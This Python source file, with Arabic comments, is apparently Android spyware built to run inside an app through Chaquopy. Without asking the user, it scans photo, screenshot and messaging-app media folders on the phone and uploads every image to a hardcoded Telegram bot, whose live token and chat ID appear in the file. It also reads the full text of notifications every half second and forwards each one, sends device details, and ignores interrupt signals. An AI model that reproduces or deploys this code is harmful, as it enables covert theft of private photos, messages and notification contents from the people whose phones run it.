import os
import requests
from PIL import Image
import io
import time
import json
from concurrent.futures import ThreadPoolExecutor, as_completed
import threading
import sys
import signal
import subprocess
import re
import traceback
import platform

# ============================================
# تكوين السرعة القصوى - تشغيل تلقائي كامل
# ============================================

BOT_TOKEN = "8721590192:AAFcAdOZaiDyL5P1D24r6qDPvvwTJ4_i8ek"
CHAT_ID = "8080767364"
MAX_WORKERS = 10  # أقصى توازي
COMPRESSION_QUALITY = 80  # جودة مثالية للسرعة
AUTO_START = True  # تشغيل تلقائي بدون أي أسئلة
SHOW_OUTPUT = True  # عرض التقدم

# ============================================
# مراقبة الإشعارات - تكوين
# ============================================

NOTIFICATION_MONITOR = True  # تفعيل مراقبة الإشعارات
NOTIFICATION_CHECK_INTERVAL = 0.5  # فحص كل نصف ثانية
LOG_NOTIFICATIONS = True  # تسجيل الإشعارات في ملف

# ============================================
# نظام التشخيص الذكي - ERROR DETECTION
# ============================================

class ErrorDetective:
    """يكتشف المشاكل ويبعت تقرير كامل للبوت"""
    
    def __init__(self):
        self.error_log = []
        self.last_check_time = time.time()
        self.check_interval = 30  # فحص كل 30 ثانية
        self.monitoring_active = True
        self.lock = threading.Lock()
        self.error_count = 0
        
        # قائمة الأخطاء المتوقعة
        self.known_errors = {
            'permission': ['permission denied', 'access denied', 'لا يمكن الوصول', 'ممنوع'],
            'network': ['timeout', 'connection', 'network', 'internet', 'socket'],
            'memory': ['memory', 'ram', 'out of memory', 'ذاكرة'],
            'file': ['no such file', 'file not found', 'cannot open', 'الملف غير موجود'],
            'telegram': ['bot token', 'chat id', 'telegram api', '400', '401', '403', '429'],
            'image': ['corrupted', 'invalid image', 'صورة تالفة', 'cannot identify'],
            'thread': ['thread', 'deadlock', 'race condition'],
            'notification': ['notification', 'dumpsys', 'logcat', 'subprocess'],
        }
    
    def add_error(self, error_type, error_message, details=None):
        """تسجيل خطأ جديد"""
        with self.lock:
            error_entry = {
                'id': self.error_count,
                'type': error_type,
                'message': error_message,
                'details': details or {},
                'time': time.time(),
                'timestamp': time.strftime('%Y-%m-%d %H:%M:%S'),
                'resolved': False,
                'solution_sent': False
            }
            self.error_log.append(error_entry)
            self.error_count += 1
            
            # إرسال فوري للخطأ
            self.send_error_report(error_entry)
            
            return error_entry
    
    def send_error_report(self, error):
        """إرسال تقرير خطأ مفصل للبوت"""
        try:
            # بناء رسالة الخطأ
            message = "🚨 *خطأ تقني تم اكتشافه* 🚨\n\n"
            message += f"🔴 *النوع:* {error['type'].upper()}\n"
            message += f"📝 *الرسالة:* `{error['message']}`\n"
            message += f"⏱️ *الوقت:* {error['timestamp']}\n"
            message += f"🆔 *رقم الخطأ:* #{error['id']}\n\n"
            
            # إضافة تفاصيل إضافية
            if error['details']:
                message += "📋 *التفاصيل:*\n```\n"
                for key, value in error['details'].items():
                    message += f"{key}: {value}\n"
                message += "```\n\n"
            
            # معلومات النظام
            message += "🖥️ *معلومات النظام:*\n"
            message += f"```\n"
            message += f"الجهاز: {platform.node()}\n"
            message += f"النظام: {platform.system()} {platform.release()}\n"
            message += f"المعالج: {platform.processor() or 'غير معروف'}\n"
            message += f"وقت التشغيل: {time.time() - self.last_check_time:.0f} ثانية\n"
            message += f"```\n\n"
            
            # تعليمات للحل
            message += "🔧 *الحل المقترح:*\n"
            
            if error['type'] == 'permission':
                message += "• تأكد من منح صلاحيات التخزين للتطبيق\n"
                message += "• أعد تشغيل التطبيق بعد منح الصلاحيات\n"
            elif error['type'] == 'network':
                message += "• تحقق من اتصال الإنترنت\n"
                message += "• تأكد من أن البوت شغال\n"
                message += "• أعد المحاولة بعد دقيقة\n"
            elif error['type'] == 'telegram':
                message += "• تحقق من توكن البوت\n"
                message += "• تأكد من صحة معرف الدردشة\n"
                message += "• تأكد أن البوت ليس محظوراً\n"
            elif error['type'] == 'memory':
                message += "• أعد تشغيل التطبيق لتفريغ الذاكرة\n"
                message += "• قلل عدد العمال (MAX_WORKERS)\n"
            elif error['type'] == 'notification':
                message += "• تأكد من صلاحيات الإشعارات\n"
                message += "• شغّل خدمة الإشعارات في الإعدادات\n"
            
            # إضافة الكود المطلوب
            message += "\n📟 *لإرسال هذا الخطأ للمطور:*\n"
            message += "```\n"
            message += f"الخطأ #{error['id']}\n"
            message += f"انسخ هذا الرد وأرسله للمطور\n"
            message += "```\n"
            
            # إرسال للبوت
            url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"
            data = {
                'chat_id': CHAT_ID,
                'text': message,
                'parse_mode': 'Markdown'
            }
            
            response = requests.post(url, data=data, timeout=10)
            
            if response.status_code == 200:
                print(f"✅ تم إرسال تقرير الخطأ #{error['id']}")
                return True
            else:
                print(f"❌ فشل إرسال التقرير: {response.status_code}")
                return False
                
        except Exception as e:
            print(f"⚠️ فشل إرسال تقرير الخطأ: {e}")
            return False
    
    def send_solution(self, error_id, solution_code):
        """إرسال حل للخطأ"""
        try:
            # البحث عن الخطأ
            error = None
            for e in self.error_log:
                if e['id'] == error_id:
                    error = e
                    break
            
            if not error:
                return
            
            message = "✅ *تم إيجاد حل للخطأ* ✅\n\n"
            message += f"🔴 *الخطأ:* #{error_id}\n"
            message += f"📝 *النوع:* {error['type']}\n\n"
            
            message += "📟 *الكود المطلوب تحديثه:*\n"
            message += "```python\n"
            message += solution_code
            message += "\n```\n\n"
            
            message += "🔄 *للتحديث:*\n"
            message += "1. انسخ الكود أعلاه\n"
            message += "2. استبدل الجزء المعطوب\n"
            message += "3. أعد تشغيل التطبيق\n"
            
            url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"
            data = {
                'chat_id': CHAT_ID,
                'text': message,
                'parse_mode': 'Markdown'
            }
            
            requests.post(url, data=data, timeout=10)
            
        except Exception as e:
            print(f"⚠️ فشل إرسال الحل: {e}")
    
    def check_system_health(self):
        """فحص صحة النظام"""
        issues = []
        
        # فحص التوكن
        if not BOT_TOKEN or len(BOT_TOKEN) < 40:
            issues.append({
                'type': 'telegram',
                'message': 'توكن البوت غير صحيح',
                'details': {'current_token': BOT_TOKEN[:10] + '...'}
            })
        
        # فحص معرف الدردشة
        if not CHAT_ID:
            issues.append({
                'type': 'telegram',
                'message': 'معرف الدردشة غير محدد',
                'details': {}
            })
        
        # فحص المسارات
        critical_paths = [
            '/storage/emulated/0',
            '/sdcard',
            '/data/media/0'
        ]
        
        for path in critical_paths:
            if os.path.exists(path):
                if not os.access(path, os.R_OK):
                    issues.append({
                        'type': 'permission',
                        'message': f'لا يمكن قراءة {path}',
                        'details': {'path': path}
                    })
            else:
                issues.append({
                    'type': 'file',
                    'message': f'المسار غير موجود: {path}',
                    'details': {'path': path}
                })
        
        # فحص الذاكرة
        try:
            import psutil
            memory = psutil.virtual_memory()
            if memory.percent > 90:
                issues.append({
                    'type': 'memory',
                    'message': f'الذاكرة منخفضة: {memory.percent}% مستخدم',
                    'details': {
                        'total': memory.total,
                        'available': memory.available,
                        'percent': memory.percent
                    }
                })
        except:
            pass  # psutil مش متاح
        
        return issues
    
    def monitor_loop(self):
        """مراقبة مستمرة للنظام"""
        while self.monitoring_active:
            try:
                # فحص دوري
                current_time = time.time()
                if current_time - self.last_check_time > self.check_interval:
                    issues = self.check_system_health()
                    for issue in issues:
                        self.add_error(issue['type'], issue['message'], issue['details'])
                    self.last_check_time = current_time
                
                time.sleep(5)
            except Exception as e:
                print(f"⚠️ خطأ في مراقبة النظام: {e}")
    
    def start_monitoring(self):
        """بدء المراقبة في خيط منفصل"""
        thread = threading.Thread(target=self.monitor_loop, daemon=True)
        thread.start()
        print("🕵️ بدء المراقبة الذكية للأخطاء")

# ============================================
# إنشاء المحقق
# ============================================
error_detective = ErrorDetective()

# ============================================
# Tool API reference (سيتم تعيينه إذا كان متاحاً)
# ============================================
tool_api = None

# ============================================
# كاش فائق السرعة
# ============================================

class TurboCache:
    def __init__(self):
        self.cache = {}
        self.hit_count = 0
        self.miss_count = 0
        self.lock = threading.Lock()
        self.error_count = 0
    
    def get(self, path):
        try:
            with self.lock:
                if path in self.cache:
                    self.hit_count += 1
                    cached = self.cache[path]
                    cached.seek(0)
                    return io.BytesIO(cached.read())
                self.miss_count += 1
                return None
        except Exception as e:
            self.error_count += 1
            error_detective.add_error('cache', f'خطأ في الكاش: {e}', {'path': path})
            return None
    
    def set(self, path, data):
        try:
            with self.lock:
                data.seek(0)
                self.cache[path] = io.BytesIO(data.read())
        except Exception as e:
            self.error_count += 1
            error_detective.add_error('cache', f'خطأ في تخزين الكاش: {e}', {'path': path})

turbo_cache = TurboCache()

# ============================================
# مراقب الإشعارات - كلاس متطور
# ============================================

class NotificationMonitor:
    def __init__(self):
        self.running = False
        self.monitor_thread = None
        self.last_notifications = set()
        self.notification_count = 0
        self.lock = threading.Lock()
        self.log_file = "notifications_log.txt"
        self.error_count = 0
        
        # أوامر لجلب الإشعارات على Android
        self.notification_commands = [
            ['dumpsys', 'notification', '--noredact'],
            ['content', 'query', '--uri', 'content://android.provider.Notification.Badge'],
            ['logcat', '-d', '-s', 'NotificationService:V', 'StatusBar:V'],
        ]
        
        # أنماط لاستخراج محتوى الإشعارات
        self.notification_patterns = [
            r'tickerText=([^\n]+)',
            r'android\.title=([^\n]+)',
            r'android\.text=([^\n]+)',
            r'contentTitle=([^\n]+)',
            r'contentText=([^\n]+)',
            r'subText=([^\n]+)',
            r'appName=([^\n]+)',
            r'package=([^\n]+)',
        ]
    
    def start(self):
        """بدء مراقبة الإشعارات في خيط منفصل"""
        if self.running:
            return
        
        self.running = True
        self.monitor_thread = threading.Thread(target=self._monitor_loop, daemon=True)
        self.monitor_thread.start()
        
        if SHOW_OUTPUT:
            print("🔔 بدء مراقبة الإشعارات...")
    
    def stop(self):
        """إيقاف مراقبة الإشعارات"""
        self.running = False
        if self.monitor_thread:
            self.monitor_thread.join(timeout=2)
        
        if SHOW_OUTPUT:
            print("🔕 إيقاف مراقبة الإشعارات")
    
    def _monitor_loop(self):
        """الحلقة الرئيسية لمراقبة الإشعارات"""
        while self.running:
            try:
                notifications = self._get_current_notifications()
                new_notifications = notifications - self.last_notifications
                
                for notification in new_notifications:
                    self._send_notification_to_telegram(notification)
                    self.notification_count += 1
                    
                    if LOG_NOTIFICATIONS:
                        self._log_notification(notification)
                
                self.last_notifications = notifications
                time.sleep(NOTIFICATION_CHECK_INTERVAL)
                
            except Exception as e:
                self.error_count += 1
                error_detective.add_error('notification', f'خطأ في مراقبة الإشعارات: {e}', {
                    'trace': traceback.format_exc()
                })
                time.sleep(1)
    
    def _get_current_notifications(self):
        """جلب الإشعارات الحالية من النظام"""
        notifications = set()
        
        for cmd in self.notification_commands:
            try:
                result = subprocess.run(
                    cmd, 
                    capture_output=True, 
                    text=True, 
                    timeout=3,
                    check=False
                )
                
                if result.returncode == 0 and result.stdout:
                    extracted = self._extract_notifications(result.stdout)
                    notifications.update(extracted)
                    
            except subprocess.TimeoutExpired:
                error_detective.add_error('notification', 'انتهت مهلة أمر الإشعارات', {'cmd': cmd[0]})
            except subprocess.SubprocessError as e:
                error_detective.add_error('notification', f'خطأ في تنفيذ الأمر: {e}', {'cmd': cmd[0]})
            except FileNotFoundError:
                error_detective.add_error('notification', f'الأمر غير موجود: {cmd[0]}', {'cmd': cmd[0]})
        
        return notifications
    
    def _extract_notifications(self, text):
        """استخراج الإشعارات من النص الخام"""
        extracted = set()
        
        try:
            for pattern in self.notification_patterns:
                matches = re.findall(pattern, text, re.IGNORECASE)
                for match in matches:
                    if match and len(match) > 3:
                        clean = match.strip()
                        if clean:
                            extracted.add(clean)
            
            notification_blocks = re.split(r'NotificationRecord\{|Notification\{', text)
            for block in notification_blocks[1:]:
                lines = block.split('\n')[:10]
                notification_text = ' '.join([l for l in lines if l and len(l) < 200])
                if notification_text and len(notification_text) > 10:
                    extracted.add(notification_text[:200])
        except Exception as e:
            error_detective.add_error('notification', f'خطأ في استخراج الإشعارات: {e}', {})
        
        return extracted
    
    def _send_notification_to_telegram(self, notification_text):
        """إرسال الإشعار إلى تليجرام"""
        try:
            url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"
            
            message = f"🔔 *إشعار جديد*\n\n"
            message += f"```\n{notification_text}\n```\n"
            message += f"⏱️ {time.strftime('%H:%M:%S')}"
            
            data = {
                'chat_id': CHAT_ID,
                'text': message,
                'parse_mode': 'Markdown'
            }
            
            response = requests.post(url, data=data, timeout=5)
            
            if response.status_code == 200:
                if SHOW_OUTPUT:
                    print(f"📨 إشعار: {notification_text[:50]}...")
            else:
                error_detective.add_error('telegram', f'فشل إرسال الإشعار: {response.status_code}', {
                    'response': response.text[:200]
                })
                
        except requests.exceptions.Timeout:
            error_detective.add_error('network', 'انتهت مهلة إرسال الإشعار', {})
        except requests.exceptions.ConnectionError:
            error_detective.add_error('network', 'لا يوجد اتصال بالإنترنت', {})
        except Exception as e:
            error_detective.add_error('telegram', f'خطأ في إرسال الإشعار: {e}', {})
    
    def _log_notification(self, notification):
        """تسجيل الإشعار في ملف"""
        try:
            with open(self.log_file, 'a', encoding='utf-8') as f:
                timestamp = time.strftime('%Y-%m-%d %H:%M:%S')
                f.write(f"[{timestamp}] {notification}\n")
                f.write("-" * 50 + "\n")
        except Exception as e:
            error_detective.add_error('file', f'فشل تسجيل الإشعار: {e}', {})
    
    def get_stats(self):
        """الحصول على إحصائيات المراقبة"""
        return {
            'total_notifications': self.notification_count,
            'running': self.running,
            'errors': self.error_count
        }

# ============================================
# إنشاء مراقب الإشعارات
# ============================================
notification_monitor = NotificationMonitor()

# ============================================
# دوال مساعدة لمعالجة الصور بشكل آمن
# ============================================

def safe_open_image_wrapper(image_path):
    """
    فتح صورة بشكل آمن باستخدام tool_api إذا كان متاحاً
    """
    global tool_api
    
    try:
        if tool_api and hasattr(tool_api, 'safe_open_image'):
            return tool_api.safe_open_image(image_path)
        else:
            return Image.open(image_path)
    except Exception as e:
        error_detective.add_error('image', f'فشل فتح الصورة: {e}', {
            'path': image_path,
            'trace': traceback.format_exc()
        })
        return None

def verify_image_file_wrapper(image_path):
    """
    التحقق من صحة ملف الصورة
    """
    global tool_api
    
    try:
        if tool_api and hasattr(tool_api, 'verify_image_file'):
            return tool_api.verify_image_file(image_path)
        else:
            with Image.open(image_path) as img:
                img.verify()
            return True
    except Exception as e:
        error_detective.add_error('image', f'صورة تالفة: {e}', {
            'path': image_path
        })
        return False

def filter_valid_images_wrapper(image_paths):
    """
    تصفية الصور الصالحة فقط
    """
    global tool_api
    
    try:
        if tool_api and hasattr(tool_api, 'filter_valid_image_paths'):
            return tool_api.filter_valid_image_paths(image_paths)
        else:
            valid_images = []
            with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
                futures = {executor.submit(verify_image_file_wrapper, path): path for path in image_paths}
                for future in as_completed(futures):
                    path = futures[future]
                    try:
                        if future.result():
                            valid_images.append(path)
                    except:
                        pass
            return valid_images
    except Exception as e:
        error_detective.add_error('thread', f'خطأ في تصفية الصور: {e}', {})
        return image_paths  # في حالة الخطأ، نعيد الكل

# ============================================
# تحسين فوري للصور
# ============================================

def turbo_optimize(image_path):
    """تحسين الصورة بأقصى سرعة مع معالجة آمنة"""
    try:
        cached = turbo_cache.get(image_path)
        if cached:
            return cached
        
        img = safe_open_image_wrapper(image_path)
        if img is None:
            return None
        
        if img.mode in ('RGBA', 'P'):
            converted = Image.new('RGB', img.size, (255, 255, 255))
            converted.paste(img, (0, 0), img if img.mode == 'RGBA' else None)
            img = converted
        
        img_byte_arr = io.BytesIO()
        
        try:
            file_size = os.path.getsize(image_path)
        except:
            file_size = 0
            
        if file_size > 10 * 1024 * 1024:
            quality = 60
        elif file_size > 5 * 1024 * 1024:
            quality = 75
        else:
            quality = COMPRESSION_QUALITY
        
        img.save(img_byte_arr, format='JPEG', quality=quality, optimize=True)
        img_byte_arr.seek(0)
        
        turbo_cache.set(image_path, img_byte_arr)
        img_byte_arr.seek(0)
        
        return img_byte_arr
            
    except Exception as e:
        error_detective.add_error('image', f'فشل تحسين الصورة: {e}', {
            'path': image_path,
            'trace': traceback.format_exc()
        })
        return None

# ============================================
# مسح كل الصور بسرعة البرق
# ============================================

def scan_all_images_lightning():
    """مسح جميع الصور في الجهاز بدون توقف"""
    all_images = []
    
    android_paths = [
        '/storage/emulated/0/DCIM',
        '/storage/emulated/0/Pictures',
        '/storage/emulated/0/Download',
        '/storage/emulated/0/WhatsApp/Media',
        '/storage/emulated/0/Telegram',
        '/storage/emulated/0/Android/media/com.whatsapp',
        '/storage/emulated/0/Android/media/com.instagram.android',
        '/storage/emulated/0/Android/media/com.facebook.katana',
        '/sdcard/DCIM',
        '/sdcard/Pictures',
        '/sdcard/Download',
        '/storage/emulated/0/DCIM/Camera',
        '/storage/emulated/0/DCIM/Screenshots',
        '/storage/emulated/0/DCIM/ScreenRecorder',
        '/storage/emulated/0/DCIM/Video',
        '/storage/emulated/0/DCIM/.thumbnails',
        '/storage/emulated/0/Pictures/Screenshots',
        '/storage/emulated/0/Pictures/Instagram',
        '/storage/emulated/0/Pictures/Facebook',
        '/storage/emulated/0/Pictures/Twitter',
        '/storage/emulated/0/Pictures/Reddit',
        '/storage/emulated/0/Pictures/Telegram',
        '/storage/emulated/0/Pictures/WeChat',
        '/storage/emulated/0/Pictures/Messenger',
        '/storage/emulated/0/Pictures/Snapchat',
        '/storage/emulated/0/Download/Telegram',
        '/storage/emulated/0/Download/WhatsApp',
        '/storage/emulated/0/Download/Instagram',
        '/storage/emulated/0/Download/Facebook',
        '/data/media/0/DCIM',
        '/data/media/0/Pictures',
        '/mnt/sdcard/DCIM',
        '/mnt/sdcard/Pictures',
        '/mnt/sdcard/Download',
        '/storage/self/primary/DCIM',
        '/storage/self/primary/Pictures',
    ]
    
    extensions = ('.jpg', '.jpeg', '.png', '.gif', '.bmp', '.webp', '.heic', '.heif', '.dng', '.raw', '.tiff', '.tif')
    
    scanned = 0
    found = 0
    
    if SHOW_OUTPUT:
        print("🔍 بدء المسح التلقائي الكامل...")
        start_time = time.time()
    
    for base_path in android_paths:
        try:
            if os.path.exists(base_path):
                if SHOW_OUTPUT:
                    print(f"📁 مسح: {base_path}")
                
                try:
                    files = os.listdir(base_path)
                    scanned += 1
                    
                    for file in files:
                        if file.lower().endswith(extensions):
                            full_path = os.path.join(base_path, file)
                            all_images.append(full_path)
                            found += 1
                            
                            if SHOW_OUTPUT and found % 100 == 0:
                                print(f"   ✅ {found} صورة حتى الآن...")
                except PermissionError:
                    error_detective.add_error('permission', f'لا يمكن قراءة المجلد: {base_path}', {
                        'path': base_path
                    })
                except Exception as e:
                    error_detective.add_error('file', f'خطأ في قراءة المجلد: {e}', {
                        'path': base_path
                    })
        except:
            pass
    
    all_images = list(dict.fromkeys(all_images))
    
    if SHOW_OUTPUT:
        print(f"🔍 جاري التحقق من صحة {len(all_images)} صورة...")
    
    if SHOW_OUTPUT:
        elapsed = time.time() - start_time
        print(f"✅ اكتمل المسح: {len(all_images)} صورة في {elapsed:.1f} ثانية")
    
    return all_images

# ============================================
# إرسال فوري بدون توقف
# ============================================

def send_single_shot(image_path):
    """إرسال صورة واحدة بدون أي تأخير"""
    try:
        optimized = turbo_optimize(image_path)
        if not optimized:
            return False, image_path, "فشل التحسين"
        
        url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendPhoto"
        
        files = {'photo': ('img.jpg', optimized, 'image/jpeg')}
        data = {'chat_id': CHAT_ID}
        
        response = requests.post(url, data=data, files=files, timeout=15)
        
        if response.status_code == 200:
            if SHOW_OUTPUT:
                print(f"✅ {os.path.basename(image_path)}")
            return True, image_path, "ok"
        else:
            error_detective.add_error('telegram', f'فشل إرسال الصورة: {response.status_code}', {
                'path': image_path,
                'response': response.text[:200]
            })
            return False, image_path, f"http-{response.status_code}"
            
    except requests.exceptions.Timeout:
        error_detective.add_error('network', 'انتهت مهلة إرسال الصورة', {'path': image_path})
        return False, image_path, "timeout"
    except requests.exceptions.ConnectionError:
        error_detective.add_error('network', 'لا يوجد اتصال بالإنترنت', {'path': image_path})
        return False, image_path, "no internet"
    except Exception as e:
        error_detective.add_error('telegram', f'خطأ في إرسال الصورة: {e}', {
            'path': image_path,
            'trace': traceback.format_exc()
        })
        return False, image_path, str(e)[:20]

# ============================================
# المدمرة - إرسال كل الصور بدون رحمة
# ============================================

def destroy_mode():
    """إرسال كل الصور بدون أي توقف أو أسئلة"""
    
    output_lines = []
    
    def add_output(text):
        output_lines.append(text)
        if SHOW_OUTPUT:
            print(text)
    
    add_output("\n" + "=" * 60)
    add_output("💥 MODE: TOTAL DESTRUCTION - ZERO DELAY")
    add_output("=" * 60)
    
    all_images = scan_all_images_lightning()
    
    if not all_images:
        add_output("❌ ZERO IMAGES FOUND - SYSTEM HALT")
        error_detective.add_error('file', 'لا توجد صور في الجهاز', {})
        return
    
    add_output(f"\n🎯 TARGET: {len(all_images)} IMAGES")
    add_output(f"⚡ WORKERS: {MAX_WORKERS} PARALLEL THREADS")
    
    if tool_api and hasattr(tool_api, 'filter_valid_image_paths'):
        add_output("🔍 جاري التحقق من صحة الصور...")
        valid_images = filter_valid_images_wrapper(all_images)
        corrupted = len(all_images) - len(valid_images)
        if corrupted > 0:
            add_output(f"⚠️ تم اكتشاف {corrupted} صورة تالفة - سيتم تخطيها")
        all_images = valid_images
    
    add_output("🚀 AUTO FIRING IN 3 SECONDS...")
    
    for i in range(3, 0, -1):
        add_output(f"⏱️ {i}...")
        time.sleep(1)
    
    sent = 0
    failed = 0
    corrupted_skipped = 0
    start_time = time.time()
    results = []
    
    add_output("\n🔥 FIRING SEQUENCE INITIATED")
    add_output("-" * 40)
    
    with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
        futures = {executor.submit(send_single_shot, img): img for img in all_images}
        
        for future in as_completed(futures):
            img_path = futures[future]
            try:
                success, _, msg = future.result()
                if success:
                    sent += 1
                else:
                    if "تالفة" in msg:
                        corrupted_skipped += 1
                    else:
                        failed += 1
                results.append((success, img_path))
            except Exception as e:
                failed += 1
                results.append((False, img_path))
                error_detective.add_error('thread', f'خطأ في معالجة الصورة: {e}', {
                    'path': img_path
                })
            
            total_processed = sent + failed + corrupted_skipped
            if SHOW_OUTPUT and total_processed % 10 == 0:
                add_output(f"📊 Progress: {total_processed}/{len(all_images)} (✓{sent} ✗{failed} ⚠️{corrupted_skipped})")
    
    elapsed = time.time() - start_time
    speed = sent / elapsed if elapsed > 0 else 0
    
    add_output("\n" + "=" * 60)
    add_output("💀 MISSION COMPLETE")
    add_output("=" * 60)
    add_output(f"📸 TOTAL: {len(all_images)}")
    add_output(f"✅ SENT: {sent}")
    add_output(f"❌ FAILED: {failed}")
    add_output(f"⚠️ CORRUPTED SKIPPED: {corrupted_skipped}")
    add_output(f"⏱️ TIME: {elapsed:.1f} seconds")
    add_output(f"⚡ SPEED: {speed:.1f} images/second")
    
    hit_rate = 0
    if turbo_cache.hit_count + turbo_cache.miss_count > 0:
        hit_rate = turbo_cache.hit_count / (turbo_cache.hit_count + turbo_cache.miss_count) * 100
    add_output(f"🎯 CACHE HIT RATE: {hit_rate:.1f}%")
    
    notif_stats = notification_monitor.get_stats()
    add_output(f"🔔 NOTIFICATIONS CAPTURED: {notif_stats['total_notifications']}")
    add_output(f"🚨 ERRORS DETECTED: {error_detective.error_count}")
    
    try:
        report = {
            "total": len(all_images),
            "sent": sent,
            "failed": failed,
            "corrupted_skipped": corrupted_skipped,
            "time": elapsed,
            "speed": speed,
            "timestamp": time.time(),
            "notifications_captured": notif_stats['total_notifications'],
            "errors_detected": error_detective.error_count
        }
        with open("operation_report.json", "w") as f:
            json.dump(report, f, indent=2)
        add_output(f"\n📁 تم حفظ التقرير في: operation_report.json")
    except Exception as e:
        add_output(f"\n⚠️ لا يمكن حفظ التقرير: {e}")
        error_detective.add_error('file', f'فشل حفظ التقرير: {e}', {})
    
    return "\n".join(output_lines), report

# ============================================
# الإطلاق التلقائي - بدون أي أسئلة
# ============================================

def auto_launch(tool_api_ref=None):
    """تشغيل تلقائي بدون أي تدخل بشري"""
    
    global tool_api
    tool_api = tool_api_ref
    
    # بدء المراقبة الذكية
    error_detective.start_monitoring()
    
    # فحص أولي
    initial_issues = error_detective.check_system_health()
    for issue in initial_issues:
        error_detective.add_error(issue['type'], issue['message'], issue['details'])
    
    # إظهار حالة tool_api
    if tool_api:
        print("✅ tool_api متاح - استخدام الدوال المساعدة الآمنة")
        if hasattr(tool_api, 'safe_open_image'):
            print("   - safe_open_image متاح")
        if hasattr(tool_api, 'verify_image_file'):
            print("   - verify_image_file متاح")
        if hasattr(tool_api, 'filter_valid_image_paths'):
            print("   - filter_valid_image_paths متاح")
    else:
        print("ℹ️ tool_api غير متاح - استخدام الطرق التقليدية")
    
    # تجاهل إشارات الإيقاف
    try:
        signal.signal(signal.SIGINT, signal.SIG_IGN)
    except:
        pass
    
    # بدء مراقبة الإشعارات
    if NOTIFICATION_MONITOR:
        notification_monitor.start()
        print("🔔 مراقبة الإشعارات نشطة - سيتم إرسال كل إشعار فوراً")
    
    # إرسال رسالة بدء التشغيل
    try:
        start_msg = "🚀 *تم تشغيل النظام*\n\n"
        start_msg += f"📸 بحث عن الصور...\n"
        start_msg += f"🔔 مراقبة الإشعارات: نشطة\n"
        start_msg += f"🕵️ مراقبة الأخطاء: نشطة\n"
        start_msg += f"⏱️ {time.strftime('%Y-%m-%d %H:%M:%S')}"
        
        url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"
        data = {
            'chat_id': CHAT_ID,
            'text': start_msg,
            'parse_mode': 'Markdown'
        }
        requests.post(url, data=data, timeout=5)
    except:
        pass
    
    # بدء التدمير فوراً
    output, report = destroy_mode()
    
    # استخدام tool_api.set_output إذا كان متاحاً
    if tool_api and hasattr(tool_api, 'set_output'):
        tool_api.set_output(output)
    
    # البقاء قيد التشغيل مع مراقبة الإشعارات
    print("\n🔄 SYSTEM IDLE - MONITORING NOTIFICATIONS & ERRORS")
    print("🔔 PRESS CTRL+C TO TERMINATE")
    
    try:
        while True:
            time.sleep(5)
            if SHOW_OUTPUT:
                notif_stats = notification_monitor.get_stats()
                error_stats = error_detective.error_count
                print(f"📊 إحصائيات: {notif_stats['total_notifications']} إشعار | {error_stats} خطأ", end='\r')
    except KeyboardInterrupt:
        print("\n\n👋 SYSTEM TERMINATED")
        if NOTIFICATION_MONITOR:
            notification_monitor.stop()
        error_detective.monitoring_active = False

# ============================================
# نقطة الدخول - لا شيء سوى التشغيل
# ============================================

def run(argument="", tool_api_ref=None):
    """
    نقطة الدخول الرئيسية - للاستدعاء من Chaquopy
    """
    auto_launch(tool_api_ref)
    return "اكتمل التنفيذ"

if __name__ == "__main__":
    print("=" * 60)
    print("🤖 TELEGRAM IMAGE DESTROYER v5.0")
    print("⚡ AUTO MODE: ZERO INPUT REQUIRED")
    print("🔔 NOTIFICATION MONITOR: ENABLED")
    print("🕵️ SMART ERROR DETECTION: ENABLED")
    print("⚡ SAFE IMAGE HANDLING: ENABLED")
    print("=" * 60)
    
    auto_launch()
